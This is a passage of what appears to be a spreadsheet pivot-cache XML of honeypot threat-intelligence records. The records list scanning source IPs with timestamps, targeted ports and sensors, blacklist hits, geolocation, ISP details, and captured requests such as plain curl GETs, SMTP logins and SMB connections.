    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTP_H38&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;80&amp;&amp;40634&amp;&amp;23&amp;&amp;NA&amp;&amp;35094&amp;&amp;35138"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taipei"/>
    <s v="New Taipei"/>
    <s v="New Taipei City"/>
    <s v="12908892"/>
    <s v="NA"/>
    <s v="25.062"/>
    <s v="121.457"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc82:9d3e"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2741"/>
    <x v="2741"/>
    <s v="59-126-160-245.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-07T11:00:55"/>
    <d v="2023-07-24T19:53:17"/>
    <d v="2025-04-07T11:00:55"/>
    <n v="3445"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5254&amp;&amp;23&amp;&amp;34395&amp;&amp;34786&amp;&amp;NA&amp;&amp;9100&amp;&amp;80"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:a0f5"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2742"/>
    <x v="2742"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T11:00:52"/>
    <d v="2025-02-11T20:35:43"/>
    <d v="2025-04-07T11:00:52"/>
    <n v="35"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2573:42f8"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2743"/>
    <x v="2743"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T11:00:51"/>
    <d v="2024-08-19T05:10:59"/>
    <d v="2025-04-07T11:00:51"/>
    <n v="221"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_RDP_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_MT-CPA_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3389&amp;&amp;23&amp;&amp;50204&amp;&amp;50448&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="query&amp;&amp;connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:79af:2c77"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2744"/>
    <x v="2744"/>
    <s v="220-134-152-47.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-07T11:00:47"/>
    <d v="2024-12-23T10:32:24"/>
    <d v="2025-04-07T11:00:47"/>
    <n v="250"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="23&amp;&amp;38440&amp;&amp;52702&amp;&amp;80&amp;&amp;9100&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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:982f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2745"/>
    <x v="2745"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T10:56:06"/>
    <d v="2025-04-03T10:47:29"/>
    <d v="2025-04-07T10:56:06"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'spambot.bls.digibase.ca': ['unknown']}"/>
    <n v="40"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="SE"/>
    <s v="Sweden"/>
    <s v="AB"/>
    <s v="Stockholm"/>
    <s v="Stockholm Municipality"/>
    <s v="Stockholm"/>
    <s v="2673730"/>
    <s v="100 04"/>
    <s v="59.3293"/>
    <s v="18.0686"/>
    <s v="39351"/>
    <s v="31173 Services AB"/>
    <s v="31173 Services AB"/>
    <s v="hosting"/>
    <s v="31173 Services AB"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9c3:e9db"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2746"/>
    <x v="2746"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T10:41:39"/>
    <d v="2025-04-07T10:41:39"/>
    <d v="2025-04-07T10:41:39"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehrān (District 3)"/>
    <s v="6683528"/>
    <s v="NA"/>
    <s v="35.7808"/>
    <s v="51.4361"/>
    <s v="205647"/>
    <s v="AFAGH"/>
    <s v="SHATEL Network"/>
    <s v="corporate"/>
    <s v="Aria Shatel PJSC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25ca:ad57"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2747"/>
    <x v="2747"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T10:28:42"/>
    <d v="2025-03-22T06:40:48"/>
    <d v="2025-04-07T10:28:42"/>
    <n v="474"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_SMTP_HC1"/>
    <s v="25&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="CH"/>
    <s v="Switzerland"/>
    <s v="BE"/>
    <s v="Bern"/>
    <s v="Bern-Mittelland District"/>
    <s v="Bern"/>
    <s v="2661552"/>
    <s v="3000"/>
    <s v="46.948"/>
    <s v="7.44745"/>
    <s v="42624"/>
    <s v="Global-Data System IT Corporation"/>
    <s v="Global-Data System IT Corporation"/>
    <s v="hosting"/>
    <s v="Global-Data System IT Corporation"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9c4:bb6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2748"/>
    <x v="2748"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T10:21:11"/>
    <d v="2024-12-25T07:21:14"/>
    <d v="2025-04-07T10:21:11"/>
    <n v="27"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H35"/>
    <s v="1433&amp;&amp;445&amp;&amp;60485&amp;&amp;60806"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kota Malang"/>
    <s v="Malang"/>
    <s v="1636722"/>
    <s v="NA"/>
    <s v="-7.98315"/>
    <s v="112.661"/>
    <s v="141907"/>
    <s v="PT Metrosolusi Teknologi Indonesia"/>
    <s v="PT Metrosolusi Teknologi Indonesia"/>
    <s v="business"/>
    <s v="PT Metrosolusi Teknologi Indonesia"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,52142)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,52766)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,64798)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,65488)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,60485)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,60806)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,55785)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,56082)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,61969)}&amp;&amp;{Data_SMB:Incoming connection (103.163.230.130,62251)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a3:e682"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2749"/>
    <x v="2749"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T10:19:47"/>
    <d v="2025-01-18T21:48:37"/>
    <d v="2025-04-07T10:19:47"/>
    <n v="174"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;55451&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25e5:42c7"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2750"/>
    <x v="2750"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T10:09:51"/>
    <d v="2023-08-17T21:46:16"/>
    <d v="2025-04-07T10:09:51"/>
    <n v="129"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;2994&amp;&amp;45320&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2010-03-29"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b289:f90d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2751"/>
    <x v="2751"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T10:01:16"/>
    <d v="2023-09-04T21:45:00"/>
    <d v="2025-04-07T10:01:16"/>
    <n v="20546"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_SMB_H20&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="56008&amp;&amp;445&amp;&amp;20592&amp;&amp;23&amp;&amp;52503&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b008:2b96"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2752"/>
    <x v="2752"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T10:01:10"/>
    <d v="2025-03-25T19:10:44"/>
    <d v="2025-04-07T10:01:10"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
